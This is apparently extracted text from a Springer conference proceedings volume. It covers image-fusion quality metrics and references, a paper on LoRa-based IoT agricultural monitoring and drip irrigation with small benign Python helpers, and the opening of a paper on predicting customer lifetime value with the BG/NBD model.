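When all three images are perfectly correlated the eigenvalues are (3, 0, 0) and
NCIE = 1; for uncorrelated images it drops toward 1 + log_256(1/3) ≈ 0.80.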
This fusion metric is based on image features and was proposed in [73]. It measures
to what extent the gradient information of the input images has been transferred to
the fused output image. It is expressed as:

GBM = [Σ_{i=1}^{H} Σ_{j=1}^{W} (Q^{MF}(i, j) w^M(i, j) + Q^{NF}(i, j) w^N(i, j))] / [Σ_{i=1}^{H} Σ_{j=1}^{W} (w^M(i, j) + w^N(i, j))]    (4)

where Q^{MF} and Q^{NF} denote the gradient preservation of the fused image F
with respect to the input images M and N, and w^M, w^N are the corresponding
weights.
This metric was proposed in [74]. It is a performance metric that relies on image
features, namely image phase congruency; information about image edges and
corners is the important component of this PCB metric. It may be expressed as
the product of three correlation coefficients:

PCB = (P_p)^i (P_M)^j (P_m)^k    (5)

where p, M, and m refer to the phase congruency and its maximum and minimum
moments, and the exponents i, j, and k are adjustable parameters.
The results are illustrated as follows. Figure 3a–d shows the graphical analysis of
the comparative methods for NCIE, NMI, GBM, and PCB, respectively. It is evident
from Fig. 3a–d that, for the NCIE, NMI, GBM, and PCB fusion metrics, the NSCT
+ SR method shows the best performance results, while SR shows the second best
performance results among the methods listed in Table 1.
Fig. 3 a Comparative analysis via NCIE metric. b Comparative analysis via NMI metric.
c Comparative analysis via GBM metric. d Comparative analysis via PCB metric
Table 1 Comparative analysis for "image 5" from the Lytro multi-focus dataset [75]

S. No. | Metrics | DWT | ICA | DTCWT | SR | NSCT | NSCT + SR
In this paper, the authors have reviewed recent fusion-based techniques and tested
recent image fusion techniques, i.e., discrete wavelet transform (DWT), indepen-
dent component analysis (ICA), dual-tree complex wavelet transform (DTCWT),
sparse representation (SR), non-subsampled contourlet transform (NSCT), and a
hybrid of NSCT + SR.
References
1. Xiao, B., Ou, G., Tang, H., Bi, X., & Li, W. (2020). Multi-focus image fusion by hessian
matrix-based decomposition. IEEE Transactions Multimedia, 22, 285–297.
2. Wan, T., Zhu, C., & Qin, Z. (2013). Multifocus image fusion based on robust principal
component analysis. Pattern Recognition Letter, 34, 1001–1008.
3. Guo, X., Nie, R., Cao, J., Zhou, D., Mei, L., & He, K. (2019). Fuse GAN: Learning to fuse multi-
focus image via conditional generative adversarial network. IEEE Transaction Multimedia, 21,
1982–1996.
4. Zhang, Q., & Guo, B.-L. (2009). Multifocus image fusion using the nonsubsampled contourlet
transform. Signal Processing, 89, 1334–1346.
5. Kou, F., Wei, Z., Chen, W., Wu, X., Wen, C., & Li, Z. (2018). Intelligent detail enhancement
for exposure fusion. IEEE Transaction Multimedia, 20, 484–495.
6. Laganà, M. M., Preti, M. G., Forzoni, L., D’Onofrio, S., De Beni, S., Barberio, A., Pietro, C., &
Baselli, G. (2013). Transcranial ultrasound and magnetic resonance image fusion with virtual
navigator. IEEE Transaction Multimedia, 15, 1039–1048.
7. Wang, T., Chiu, C., Wu, W., Wang, J., Lin, C., Chiu, C., & Liou, J. (2015). Pseudo-multiple-
exposure-based tone fusion with local region adjustment. IEEE Transaction Multimedia, 17,
470–484.
8. Amin-Naji, M., & Aghagolzadeh, A. (2018). Multi-focus image fusion in DCT domain using
variance and energy of laplacian and correlation coefficient for visual sensor networks. Journal
of AI Data Mining, 6, 233–250.
9. Dou, W. (2018). Image degradation for quality assessment of pan-sharpening methods. Remote
Sensing, 10, 154.
10. Li, H., Jing, L., Tang, Y., & Wang, L. (2018). An image fusion method based on image
segmentation for high-resolution remotely-sensed imagery. Remote Sensing, 10, 790.
11. Li, Q., Yang, X., Wu, W., Liu, K., & Jeon, G. (2018). Multi-focus image fusion method for
vision sensor systems via dictionary learning with guided filter. Sensors, 18, 2143.
12. Cao, T., Dinh, A., Wahid, K. A., Panjvani, K., & Vail, S. (2018). Multi-focus fusion technique
on low-cost camera images for canola phenotyping. Sensors, 18, 1887.
13. Ganasala, P., & Kumar, V. (2014). Multimodality medical image fusion based on new features
in NSST domain. Biomedical Engineering Letters, 4, 414–424.
14. Du, J., Li, W., & Tan, H. (2019). Intrinsic image decomposition-based grey and pseudo-color
medical image fusion. IEEE Access, 7, 56443–56456.
15. Hu, H., Wu, J., Li, B., Guo, Q., & Zheng, J. (2017). An adaptive fusion algorithm for visible
and infrared videos based on entropy and the cumulative distribution of gray levels. IEEE
Transaction Multimedia, 19, 2706–2719.
16. Borsoi, R. A., Imbiriba, T., & Bermudez, J. C. M. (2020). Super-resolution for hyperspectral
and multispectral image fusion accounting for seasonal spectral variability. IEEE Transactions
on Image Processing, 29, 116–127.
17. Shao, Z., & Cai, J. (2018). Remote sensing image fusion with deep convolutional neural
network. IEEE Journal of Selected Topics in Applied Earth Observations and Remote Sensing,
11, 1656–1669.
18. Yang, B., & Li, S. (2010). Multifocus image fusion and restoration with sparse representation.
IEEE Transactions on Instrumentation and Measurement, 59, 884–892.
19. Merianos, I., & Mitianoudis, N. (2019). Multiple-exposure image fusion for HDR image
synthesis using learned analysis transformations. Journal of Imaging, 5, 32.
20. Liu, Y., Chen, X., Ward, R. K., & Wang, Z. J. (2016). Image fusion with convolutional sparse
representation. IEEE Signal Processing Letters, 23, 1882–1886.
21. Mitianoudis, N., & Stathaki, T. (2007). Pixel-based and region-based image fusion schemes
using ICA bases. Information Fusion, 8, 131–142.
22. Kumar, B. K. S. (2013). Multifocus and multispectral image fusion based on pixel significance
using discrete cosine harmonic wavelet transform. Signal Image Video Process., 7, 1125–1143.
23. Rahman, M. A., Lin, S. C. F., Wong, C. Y., Jiang, G., Liu, S., & Kwok, N. (2016). Efficient
colour image compression using fusion approach. Imaging Science Journal, 64, 166–177.
24. Naidu, V. P. S., & Raol, J. R. (2008). Pixel-level image fusion using wavelets and principal
component analysis. Defence Science Journal, 58, 338–352.
25. Burt, P., & Adelson, E. (1983). The laplacian pyramid as a compact image code. IEEE
Transactions on Communications, 31, 532–540.
26. Adelson, E. H., Anderson, C. H., Bergen, J. R., Burt, P. J., & Ogden, J. M. (1984). Pyramid
methods in image processing. RCA Engineering, 29, 33–41.
27. Zhao, W., Lu, H., & Wang, D. (2018). Multisensor image fusion and enhancement in spectral
total variation domain. IEEE Transaction Multimedia, 20, 866–879.
28. Rockinger, O. (1997). Image sequence fusion using a shift-invariant wavelet transform. In
Proceedings of the International Conference on Image Processing (Vol. 3, pp. 288–291). Santa
Barbara.
29. Li, H., Manjunath, B., & Mitra, S. (1995). Multisensor image fusion using the wavelet
transform. Graphical Models Image Processing, 57, 235–245.
30. Tian, P., & Ni, G. (2009). Contrast-based image fusion using the discrete wavelet transform.
Optical Engineering, 39, 2075–2082.
31. Wang, W. W., Shui, P. L., & Feng, X. C. (2008). Variational models for fusion and denoising
of multifocus images. IEEE Transactions on Signal Processing, 15, 65–68.
32. Wan, T., Canagarajah, N., & Achim, A. (2009). Segmentation-driven image fusion based on
alpha-stable modeling of wavelet coefficients. IEEE Transactions Multimedia, 11, 624–633.
33. Liu, Y., Liu, S., & Wang, Z. (2015). Multi-focus image fusion with dense SIFT. Information
Fusion, 23, 139–155.
34. Nejati, M., Samavi, S., & Shirani, S. (2015). Multi-focus image fusion using dictionary-based
sparse representation. Information Fusion, 25, 72–84.
35. Liu, Z., Chai, Y., Yin, H., Zhou, J., & Zhu, Z. (2017). A novel multi-focus image fusion approach
based on image decomposition. Information Fusion, 35, 102–116.
36. Cao, L., Jin, L., Tao, H., Li, G., Zhuang, Z., & Zhang, Y. (2015). Multi-focus image fusion
based on spatial frequency in discrete cosine transform domain. IEEE Transactions on Signal
Processing, 22, 220–224.
37. He, K., Sun, J., & Tang, X. (2013). Guided image filtering. IEEE Transactions on Pattern
Analysis and Machine Intelligence, 35, 1397–1409.
38. Wright, J., Ma, Y., Mairal, J., Sapiro, G., Huang, T. S., & Yan, S. (2010). Sparse representation
for computer vision and pattern recognition. Proceedings of the IEEE, 98, 1031–1044.
39. Tropp, J. A. (2004). Greed is good: Algorithmic results for sparse approximation. IEEE
Transactions on Information Theory, 50, 2231–2242.
40. Qiu, X., Li, M., Zhang, L., & Yuan, X. (2019). Guided filter-based multi-focus image fusion
through focus region detection. Signal Processing Image Communication, 72, 35–46.
41. Li, S., Kang, X., & Hu, J. (2013). Image fusion with guided filtering. IEEE Transactions on
Image Processing, 22, 2864–2875.
42. Li, S., Kang, X., Hu, J., & Yang, B. (2013). Image matting for fusion of multi-focus images in
dynamic scenes. Information Fusion, 14, 147–162.
43. Wang, J., & Cohen, M. F. (2007). Image and video matting: A survey. Foundations and Trends
in Computer Graphics and Vision (Vol. 3, pp. 97–175). Now Publishers Inc., Delft.
44. Shreyamsha Kumar, B. K. (2015). Image fusion based on pixel significance using cross bilateral
filter. Signal Image Video Processing, 9, 1193–1204.
45. Bai, X., Zhang, Y., Zhou, F., & Xue, B. (2015). Quadtree-based multi-focus image fusion using
a weighted focus-measure. Information Fusion, 22, 105–118.
46. Guo, D., Yan, J., & Qu, X. (2015). High quality multi-focus image fusion using self-similarity
and depth information. Optics Communication, 338, 138–144.
47. Qu, X., Hu, C., Yan, J. (2008) Image fusion algorithm based on orientation information moti-
vated pulse coupled neural networks. In Proceedings of the 7th World Congress on Intelligent
Control and Automation (pp. 2437–2441)
48. Qu, X.-B., Yan, J.-W., Xiao, H.-Z., & Zhu, Z.-Q. (2008). Image fusion algorithm based on spatial
frequency-motivated pulse coupled neural networks in nonsubsampled contourlet transform
domain. Acta Automation Sinica, 34, 1508–1514.
49. Zhang, Y., Bai, X., & Wang, T. (2017). Boundary finding based multi-focus image fusion
through multi-scale morphological focus-measure. Information Fusion, 35, 81–101.
50. Zhou, Z., Li, S., & Wang, B. (2014). Multi-scale weighted gradient-based fusion for multi-focus
images. Information Fusion, 20, 60–72.
51. Paul, S., Sevcenco, I. S., & Agathoklis, P. (2016). Multi-exposure and multi-focus image fusion
in gradient domain. Journal Circuits System Computer, 25, 1650123.
52. Farid, M. S., Mahmood, A., & Al-Maadeed, S. A. (2019). Multi-focus image fusion using
content adaptive blurring. Information Fusion, 45, 96–112.
53. Tao, Q., & Veldhuis, R. (2009). Threshold-optimized decision-level fusion and its application
to biometrics. Pattern Recognition, 42, 823–836.
54. Durrant-Whyte, H., & Henderson, T. C. (2008). Multisensor data fusion. Springer handbook
of robotics (pp. 585–610). Springer.
55. Varshney, P. K. (2000). Multisensor data fusion. In R. Logananthara, G. Palm, & M. Ali
(Eds.), Intelligent problem solving: Methodologies and approaches (pp. 1–3). Springer.
56. Abhyankar, M., Khaparde, A., & Deshmukh, V. (2016). Spatial domain decision based image
fusion using superimposition. In Proceedings of the 2016 IEEE/ACIS 15th International
Conference on Computer and Information Science (ICIS) (pp. 1–6).
57. Liu, Y., & Wang, Z. (2015). Dense SIFT for ghost-free multi-exposure fusion. Journal of Visual
Communication and Image Representation, 31, 208–224.
58. Naidu, V., & Elias, B. (2013). A novel image fusion technique using DCT based Laplacian
Pyramid. International Journal of Invention Engineering Science (IJIES), 1, 1–9.
59. Tian, J., & Chen, L. (2012). Adaptive multi-focus image fusion using a wavelet-based statistical
sharpness measure. IEEE Transactions on Signal Processing, 92, 2137–2146.
60. Nunez, J. (1999). Multiresolution-based image fusion with additive wavelet decomposition.
IEEE Transactions on Geoscience and Remote Sensing, 37, 1204–1211.
61. Li, S., Kwok, J., & Wang, Y. (2001). Combination of images with diverse focuses using the
spatial frequency. Information Fusion, 2, 169–176.
62. Tian, J., Chen, L. (2010). Multi-focus image fusion using wavelet-domain statistics. In
Proceedings of the 2010 IEEE International Conference on Image Processing (pp. 1205–1208).
63. Liu, Y., Liu, S., & Wang, Z. (2015). A general framework for image fusion based on multi-scale
transform and sparse representation. Information Fusion, 24, 147–164.
64. Li, S., & Yang, B. (2008). Multifocus image fusion using region segmentation and spatial
frequency. Image and Vision Computing, 26, 971–979.
65. Li, S., Yang, B., & Hu, J. (2011). Performance comparison of different multi-resolution
transforms for image fusion. Information Fusion, 12, 74–84.
66. Li, S., & Yang, B. (2008). Multifocus image fusion by combining curvelet and wavelet
transform. Pattern Recognition Letter, 29, 1295–1301.
67. Haghighat, M. B. A., Aghagolzadeh, A., & Seyedarabi, H. (2011). Multi-focus image fusion for
visual sensor networks in DCT domain. Computers and Electrical Engineering, 37, 789–797.
68. Martorell, O., Sbert, C., & Buades, A. (2019). Ghosting-free DCT based multi-exposure image
fusion. Signal Processing Image Communication, 78, 409–425.
69. Kingsbury, N. (2000) The dual-tree complex wavelet transform with improved orthogo-
nality and symmetry properties. In Proceedings of IEEE International Conference on Image
Processing (ICIP) (pp. 375–378).
70. Mitianoudis, N., & Stathaki, T. (2007). Pixel-based and region-based image fusion schemes
using ICA bases. Information Fusion, 8(2), 131–142.
71. Hossny, M., Nahavandi, S., & Creighton, D. (2008). Comments on information measure for
performance of image fusion. Electronics Letters, 44(18), 1066–1067.
72. Wang, Q., Shen, Y., & Zhang, J. (2005). A nonlinear correlation measure for multivariable data
set. Physica D: Nonlinear Phenomena, 200(3–4), 287–295.
73. Xydeas, C. S., & Petrovic, V. S. (2000). Objective image fusion performance measure.
Electronics Letters, 36(4), 308–309.
74. Zhao, J., Laganiere, R., & Liu, Z. (2007). Performance assessment of combinative pixel-level
image fusion based on an absolute feature measurement. International Journal of Innovative
Computing, Information and Control, 6(3), 1433–1447.
75. Lytro Multi-focus Image Dataset. https://www.researchgate.net/publication/291522937_Lytro_Multi-focus_Image_Dataset. Accessed September 2020.
IoT-Based Agricultural Automation
Using LoRaWAN
Abstract Automation is the strategic placement of sensors such that the system
responds to various sensor readings in various situations. The practice of automation
continues to be widely adopted and integrated in healthcare, assembly-line factories
and other major industries. However, in agriculture, most of the work is manual
and effort-intensive. The farmers also do not have access to recommendations for
changing their method of operation to make the farming process cost-conservative
and more efficient. The proposed system consists of edge devices and a central node. The edge
devices have an interfaced temperature and humidity sensor (DHT11) and moisture
sensor. The data collected by these sensors in all the edge devices is transmitted to the
central node via a long-range (LoRa) gateway. The LoRa wireless communication
technology is selected as it communicates in the 433 MHz ISM band which is not
monetarily charged by network providers and thus reduces data costs apart from
providing long-range communication capability in remote rural areas without much
network connectivity. The module used is the Ai-Thinker RA-02 LoRa module. The
central node transmits this collected data to a cloud-based database. AWS has been
used for the purposes of the current work. The system provides task automation such
as drip irrigation, and stored data can be run through an analytics engine to provide
farmers with insights regarding their practices and recommendations which increase
productivity and reduce operational costs.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 261
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_21
262 J. Chauhan et al.
1 Introduction
Water is one of the important factors for the survival and development of human
beings. Thus, water plays an important role in the process of agriculture, and it also
affects the rate of economic development of a nation.
According to Patel [1], the International Water Management Institute (IWMI)
projects that the availability of water for irrigation will be comparatively less in the
future, i.e., by the year 2025. So, in order to conserve water for agriculture in the
future, new technologies are required to be implemented in the field. Currently, the
Internet of Things (IoT) is emerging in almost all sectors: it covers not only agricul-
ture but also a vast range of sectors like transport, communication, industry, health-
care and many more [2–5]. These days, sensors can be placed at a desired location
or even worn on the body to collect input data [6]. There are also use cases where
sensors collect data at different locations while in motion, thanks to the vast range
of features provided by wireless sensor nodes [7].
Current automated systems do include wireless communication between connected
devices and their interfaced sensors. However, as this communication has typically
taken place within infrastructure (buildings, factories, etc.), it has been executed
mostly via 3G/4G communication technology, which provides fast connectivity
within a closed structural infrastructure. Since a system for agricultural automation
has to operate outside in the field, certain custom requirements accompany its imple-
mentation, such as the capability to function in areas with low network coverage,
to transmit data over large distances in open farmland, and to reduce costs: the
sheer size of the farmland necessitates the use of many units, so the cost per unit
should be low to make the overall system monetarily feasible to implement and use.
Table 1 illustrates a comparison between various wireless data communication
technologies. As is evident from the table, LoRa provides tangible benefits across
the board: low power consumption (which translates to lower operating costs and
bills associated with system runtime), comparatively low costs for system setup and
maintenance, longevity even when running on battery (again due to its low power
consumption), and the highest possible operating range, which theoretically extends
up to several kilometers. In actual practice, due to disturbances created by physical
obstructions such as trees, sheds and other similar infrastructure of an obstructive
nature, the range comes down to approximately a kilometer. However, a similar
impact is observed in the range of the other wireless technologies, which undergo
the same range reduction, so LoRa retains its position as providing the highest range
for wireless communication. Its other benefits, i.e., no monetary charges incurred for
data transfer (since LoRa operates in the ISM band) and its independence from
network connectivity requirements, have been explored previously.
In the subsequent sections, the relevant aspects associated with the proposed system
design and implementation are outlined. Section 2 consists of the literature review,
and Sect. 3 presents the detailed design-related aspects of the proposed system. The
implementation and working of the system are described in Sect. 4, and Sect. 5
concludes the work along with future work.
2 Literature Review
Semtech’s LoRa is considered a short-range device (SRD) owing to its electromagnetic
transmission in the sub-GHz band. In India, for example, Semtech’s LoRa uses the
433 MHz ISM band for radio transmission. Transmitters in this band are constrained
to a 2% duty cycle, i.e., about 72 s of transmission per hour in a normal scenario.
In practice, only about half of this duty limit is needed: a duty cycle of about 1%
is large enough for the application’s devices to communicate.
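To make the duty-cycle arithmetic concrete, the sketch below computes the hourly transmit budget and the number of packets it allows; the per-packet airtime used here is an assumed, illustrative value, not a figure from the paper.

```python
def max_messages_per_hour(duty_cycle, airtime_s):
    """Packets allowed per hour under a regulatory duty-cycle limit.

    duty_cycle: fraction of time the radio may transmit (0.02 for 2%).
    airtime_s: on-air time of one packet in seconds (assumed value).
    """
    budget_s = duty_cycle * 3600.0              # transmit budget per hour
    return int(budget_s // airtime_s)

# A 2% duty cycle gives 72 s of airtime per hour, as stated above.
assert 0.02 * 3600 == 72.0

# With an assumed 1.5 s airtime per packet, a 1% duty cycle still allows:
print(max_messages_per_hour(0.01, 1.5))   # 24 packets/hour
```

Even at the halved 1% duty cycle, this budget comfortably covers periodic sensor reporting.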
For the current work, the Ai-Thinker RA-02 LoRa module has been used as it is
suitable for long-distance communications. The biggest benefit of this module is its
capability of performing all the required functionalities, at a low cost. LoRa modules
IoT-Based Agricultural Automation Using LoRaWAN 265
can be very expensive, depending on the specific module selected and its capabilities.
Certain modules may cost above INR 30,000, but it is impractical to use these
due to monetary constraints, especially when the farmland may require many edge
devices, each outfitted with a LoRa module. Moreover, our target base, the farmers,
will not opt into the system if the associated costs are prohibitively large. Thus, a
cost-effective alternative was provided in the form of the RA-02 LoRa module.
Moreover, the most important specification to consider is the frequency range. The
module provides low-power, long-range communication capabilities in the
410–525 MHz frequency range. This matters because the ISM band in India is
433 MHz; communication within this range is preferred to take advantage of
ISM-band operation, which incurs no monetary cost.
The product specifications of the RA-02 LoRa module are provided in Table 2, and
Table 3 depicts the reception sensitivity of the Ai-Thinker RA-02 radio module. Two
working frequencies, 433 MHz and 470 MHz, have been compared in terms of the
spread factor, signal-to-noise ratio (SNR) and sensitivity.

Table 3 Reception sensitivity specifications of the RA-02 LoRa module at different frequencies

Frequency   Spread factor   SNR (dB)   Sensitivity (dBm)
433 MHz     7               −7         −125
            10              −15        −134
            12              −20        −141
470 MHz     7               −7         −126
            10              −15        −135
            12              −20        −141

266 J. Chauhan et al.
The LoRa gateway acts as the central hub in the network. Many edge devices of
the network with their interfaced sensors collect data and collectively transmit the
same using LoRaWAN to the gateway. The gateway collects data from multiple edge
devices. This data can be transferred to a cloud storage facility if Internet connectivity
exists, or it can be accessed directly via the gateway without an Internet connection.
LoRa networks can include thousands of connected edge devices with many gateways
to cover an enormous area. However, considering the practical implementation of this
system in agriculture in South-East Asian countries, such extensive capabilities are
not required. The farm area in these countries is much smaller than the farms in
developed countries (farms in the US can span many thousands of acres of land,
while farms in India have an average land area of merely two acres per farmer).
Thus, in the proposed system, a single gateway connected to multiple edge devices
has been used. The LoRa gateway of the current work could be classified as “single
connection” as it is built around the SX1276/78 IC which acts as the LoRa module.
There are many SX1276/78 radio modules available, and the Ai-Thinker SX1278-based
RA-02 LoRa module is used for the current work.
Figure 1 describes the connections for the LoRa gateway by using components
which are easily available and can be procured either online or through hardware
and electronic vendors. This makes the gateway easy to assemble with seamless
part replacement and reduces the costs associated with component procurement,
replacement and assembly. The software stack is entirely open source: (a) the
Raspberry Pi runs an ordinary Raspbian distribution, (b) the long-range communication
library is based on the SX1272 library and (c) the program for the LoRa gateway is kept as
simple as reasonably possible. The gateway was tested in various conditions
with a DHT11 sensor to monitor the humidity and temperature levels. Tests show
that the low-cost gateway can be installed in outdoor conditions with the appropriate
waterproof casing.
Figure 2 shows interfacing between the edge devices and the LoRa module. Two
Arduino boards are used, both acting as edge devices with interfaced sensors. The
edge devices each have an interfaced LoRa module and can engage in data transfer
from one to another. Both the edge devices connect to a common RPi-based central
node which puts their transmitted data into a cloud database. For the current work
specifically, a Dynamo DB service offered by Amazon Web Services (AWS) has
been used. Since edge devices do not require much computational power and
perform comparatively simple operations, such as receiving interfaced sensor inputs
and transmitting them via the LoRa module at periodic intervals, Arduino UNO boards were
chosen for the edge devices considering their lower cost and adequate computational
power.
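A minimal sketch of how the RPi central node might format a reading for Dynamo DB is shown below. The table name and attribute schema are assumptions for illustration (DynamoDB stores numeric attributes as Decimal), and the actual write call is left commented out since it needs AWS credentials.

```python
from decimal import Decimal
import time

def build_item(device_id, temperature_c, humidity_pct, soil_moisture):
    """Format one sensor reading for DynamoDB; numbers go in as Decimal."""
    return {
        "device_id": device_id,                 # partition key (assumed schema)
        "timestamp": int(time.time()),          # sort key (assumed schema)
        "temperature_c": Decimal(str(temperature_c)),
        "humidity_pct": Decimal(str(humidity_pct)),
        "soil_moisture": Decimal(str(soil_moisture)),
    }

item = build_item("edge-01", 31.5, 64.0, 412)
print(item["device_id"], item["temperature_c"])

# With AWS credentials configured, the gateway could then write:
# import boto3
# boto3.resource("dynamodb").Table("farm_readings").put_item(Item=item)
```

The string-to-Decimal conversion avoids the float-precision errors boto3 rejects when serializing items.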
Figure 3 depicts the Raspberry Pi with an interfaced DHT11 sensor for sensor
calibration and testing. Once the DHT11 was calibrated, it was able to detect the ambient
temperature, the readings of which are shown in Fig. 4. Similarly, the moisture sensor
was also interfaced, calibrated and tested before being integrated into the edge device.
The readings received by the Raspberry Pi gateway from the edge devices,
which have been transferred to the Dynamo DB created on the AWS Cloud account,
are depicted in Fig. 4a, and Fig. 4b depicts the graphical representation of the soil
moisture readings (which can be obtained from Dynamo DB) on AWS. The results indicate
that the system is robust and functions appropriately even if drastic changes in the
system environment take place. In the case of the soil moisture graph, when the soil
was intentionally flooded with water, the corresponding response was recorded in the
graph at 11:06 am, one minute after the spike was induced. Likewise, on removal of
the sensor from that environment, the readings reflected the change within a minute
of the action. Thus, it is
expected that the system will function appropriately when deployed on large scale
in real fields and give data that is updated at high speed capable of reflecting any
changes that occur in the environment of the crops in real time. The proposed real-
time sensing capability and automated drip irrigation are expected to help the farmers
by reducing resource (water and electricity) wastage and optimizing operations by
using drip irrigation to conserve power as well as water.
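The one-minute response described above can be checked mechanically; the sketch below flags abrupt jumps between consecutive minute-by-minute soil-moisture samples, with an assumed, sensor-specific threshold.

```python
def detect_spikes(readings, threshold=150):
    """Return indices where consecutive samples differ by more than
    `threshold` (an assumed, sensor-specific value)."""
    return [i for i in range(1, len(readings))
            if abs(readings[i] - readings[i - 1]) > threshold]

# Minute-by-minute samples: flooding at index 3, sensor removed at index 6.
samples = [410, 405, 412, 890, 880, 875, 300]
print(detect_spikes(samples))   # [3, 6]
```

A detector like this could trigger the drip-irrigation controller instead of relying on a human watching the graph.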
Fig. 4 a Temperature readings transferred from gateway to Dynamo DB. b Soil moisture readings
graph
6 Conclusion
The research in the current work highlights several important issues that need to be
considered: (a) long-range communication for rural access, (b) cost of equipment
and administration and (c) limiting reliance on proprietary frameworks by providing
local connection models. The proposed scheme addresses the above-mentioned issues.
Targeted at small-to-medium-size deployment scenarios, the platform also lends itself
to quick deployment and customization by third parties. The processing of the device and
its connection with different cloud platforms, such as Dropbox™, Firebase™,
ThingSpeak™ and freeboard™, has been presented in the paper. Here, the low-cost
gateway runs Dynamo DB and a web server to show the received data in graphs.
As a result, the design of the low-cost LoRa gateway and end devices is completed,
with some modifications to the libraries as per the chipset used. The gateway was also
tested in various conditions with a DHT11 sensor.
7 Future Work
The creation of an Android or iOS application would be extremely beneficial and can
be undertaken in future research. Such an application would enable farmers to
access, through their mobile phones, data related to the temperature in the farm,
the moisture level in the soil and humidity readings. This would also give the farmers
the benefit of increased accessibility and mobility.
Moreover, while the ISM band in many developed countries is in the 800 MHz
range, it is 433 MHz in India. Thus, an all-purpose LoRa module that can operate at
both frequencies would be very useful, as it would eliminate the need for separate
code for the module to transmit over each frequency.
Prediction of Customer Lifetime Value
Using Machine Learning
1 Introduction
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 271
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_22
272 K. B. Reddy et al.
a customer is to your organization over an unbounded time period rather than simply
the first purchase. This estimate supports understanding a reasonable cost for every
acquisition.
We are living in a customer-centric market, so it is very important to know a
customer’s lifetime value (CLV). The better a company understands CLV, the better
it can create strategies to retain its most “profitable” customers and concentrate
its activities around them.
Machine learning algorithms are implemented in this system. Prediction of
customer lifetime is a regression problem. The dataset contains labeled data. Our
goal is to predict customer lifetime value based on labeled customer transaction
data. Therefore, supervised algorithms are used to train the dataset and predict the
outcome. The model considered for this work is the beta geometric/negative binomial
distribution (BG/NBD) model. Knowing in advance whether a customer is valuable will
help product-selling companies build their business around valuable customers.
In this system, the lifetimes Python library is used as a tool to predict the
customer lifetime value.
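The BG/NBD model is typically fit on a per-customer summary of frequency, recency and customer age T; in the lifetimes library, `BetaGeoFitter.fit` takes exactly these columns. The standard-library sketch below computes that summary from raw transaction records; the `(customer_id, date)` tuple layout of the input is an assumption for illustration.

```python
from datetime import date
from collections import defaultdict

def rfm_summary(transactions, observation_end):
    """Per-customer (frequency, recency, T) in days, as BG/NBD expects:
    frequency = repeat purchases, recency = age at last purchase,
    T = age at the end of the observation period."""
    by_customer = defaultdict(list)
    for customer_id, d in transactions:          # assumed (id, date) tuples
        by_customer[customer_id].append(d)
    summary = {}
    for cid, dates in by_customer.items():
        dates = sorted(set(dates))               # count one purchase per day
        first, last = dates[0], dates[-1]
        summary[cid] = {"frequency": len(dates) - 1,
                        "recency": (last - first).days,
                        "T": (observation_end - first).days}
    return summary

txns = [("c1", date(2021, 1, 1)), ("c1", date(2021, 1, 15)),
        ("c1", date(2021, 2, 1)), ("c2", date(2021, 1, 20))]
print(rfm_summary(txns, date(2021, 3, 1)))
```

Summaries in this shape can then be passed to `lifetimes.BetaGeoFitter` to estimate the model parameters and forecast future purchases.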
2 Literature Review
D. Chen et al. [1] and F. Yoseph et al. [2] used the k-means clustering algorithm
and decision trees to help businesses better understand their customers and
thereby conduct customer-centric marketing more effectively. The gap identified is
that they did not address customers’ buying behavior. The work of P. P.
Pramono et al. [3] used hierarchical K-means and Ward’s method to carry out
cluster evaluation. That study approached CLV segmentation in two ways
and showed that frequency was the main variable. The gap is that,
since the segmentation is based on certain factors only, the company can adjust
its marketing strategies solely on the basis of customer behavior. In A. J. Christy et al. [4],
customer segmentation is performed using recency, frequency and monetary value (RFM)
analysis and is then extended to other algorithms such as K-means
clustering and fuzzy C-means. The behavior of these approaches is analyzed, along
with the execution time of each algorithm; the gap observed is that
the proposed K-means approach consumes more time and increases the number of iterations.
The study [6] used two models, known as the BG/BB model
and the BG/NBD model, to predict customer value per product. It argues that
instead of using RFM to predict the customer lifetime value, using RFM/P to
predict the customer lifetime value gives more accuracy.
H. Jia et al. [7] used the Bayesian network model of IBM’s SPSS Modeler
tool to investigate customer lifetime value in relation to risk factors in Internet
business. The gap is that the classification of customer risk is based solely
on the assessment of enterprise business needs and prior literature, which
may lead to the exclusion of risk factors. Various linear regression techniques [8] are
used as a conventional data-analytic method for modeling CLV. In that study,
a framework has also been proposed explaining how social network information
can be incorporated into the data-analytic models. Modeling the customer lifetime
value of airline customers is chosen as the example case; the proposed procedure
has been applied to it and the findings have been evaluated.
Dahana et al. [9] used the latent class model to examine how lifestyle can explain
the heterogeneous customer lifetime values (CLVs) among different market segments.
In subsequent studies, various kinds of clustering methods [10] are used to
precisely characterize personality-based consumer perceptions of goods with
country-of-origin labels by analyzing huge amounts of transaction data. A fuzzy
clustering model [11, 12] is used to cluster system-group customers. In that
study, a framework was proposed for clustering system-group customers based on
effective factors, for example customer lifetime, customer type, customer worth,
strategic importance, and the number of software products. ANOVA and regression
models [13] are used to calculate customer equity (CE) and to project the marketing
return on investment (ROI) by using risk simulation in the context of the tourism
and hospitality industry. Mathematical models [14] are implemented to find a sound
fit between customer loyalty schemes and the prevailing notion of loyalty among
customers. The objective of E. Lee et al. [15] is to propose a churn prediction
strategy for improving profit. They proposed a churn prediction model comprising
two principal steps: (1) choosing the forecast target and (2) tuning the threshold
of the model. By applying this model to a live online game that has been in
operation for over nine years, the expected profit of the game is used to check the
method’s adequacy. Gradient boosted trees [16] are used to introduce a mathematical
model framework for determining customer lifetime value. That study conducted an
experimental examination of customer CLV based on real data sets; rather than
trying to support a base learner directly, it applies a gradient boosting algorithm.
This research [17] makes two considerable theoretical and methodological
contributions. First, the study results both add to our understanding of
hospitality customer-firm relationships and provide a foundation for future
hospitality marketing and customer relationship research. While the idea of customer
relationships has long existed, it has not been studied as a multidimensional
construct; hospitality researchers have generally focused on measuring specific
elements of customer relationships, e.g., customer commitment or loyalty. Second,
the proposed customer relationship scale provides a relationship-marketing framework
for research aimed at better understanding both the effects of various marketing
activities and the financial return on investment from marketing activities and
ventures. The aim of [18], given that customer lifetime value is highly significant,
was to establish a framework to measure that value across brands and regions. An
analytical research approach was adopted. The study produces evidence, for
example, that “lifetime economic value (EVC) differs by group, and the impact
of its drivers also varies.” In [19], binomial logistic regression is
